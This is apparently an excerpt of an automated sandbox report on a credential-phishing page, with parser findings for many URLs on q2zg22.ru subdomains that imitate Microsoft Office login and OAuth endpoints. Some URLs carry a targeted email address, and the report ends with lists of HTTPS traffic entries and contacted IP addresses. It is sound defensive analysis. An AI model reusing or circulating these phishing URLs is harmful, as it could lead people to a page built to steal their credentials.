              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: <input type="password" .../> found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNm...HTTP Parser: <input type="password" .../> found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBu...HTTP Parser: <input type="password" .../> found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: No favicon
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="author".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="author".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="author".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: No <meta name="author".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmHTTP Parser: No <meta name="author".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmHTTP Parser: No <meta name="author".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: No <meta name="author".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuHTTP Parser: No <meta name="author".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="copyright".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="copyright".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: No <meta name="copyright".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: No <meta name="copyright".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNm...HTTP Parser: No <meta name="copyright".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNm...HTTP Parser: No <meta name="copyright".. found
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: No <meta name="copyright".. found
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBu...HTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49724 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49817 version: TLS 1.2
              Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
              Source: Joe Sandbox ViewIP Address: 172.67.209.71 172.67.209.71
              Source: Joe Sandbox ViewIP Address: 162.241.124.47 162.241.124.47
              Source: Joe Sandbox ViewIP Address: 162.241.124.47 162.241.124.47
              Source: Joe Sandbox ViewIP Address: 13.107.213.41 13.107.213.41
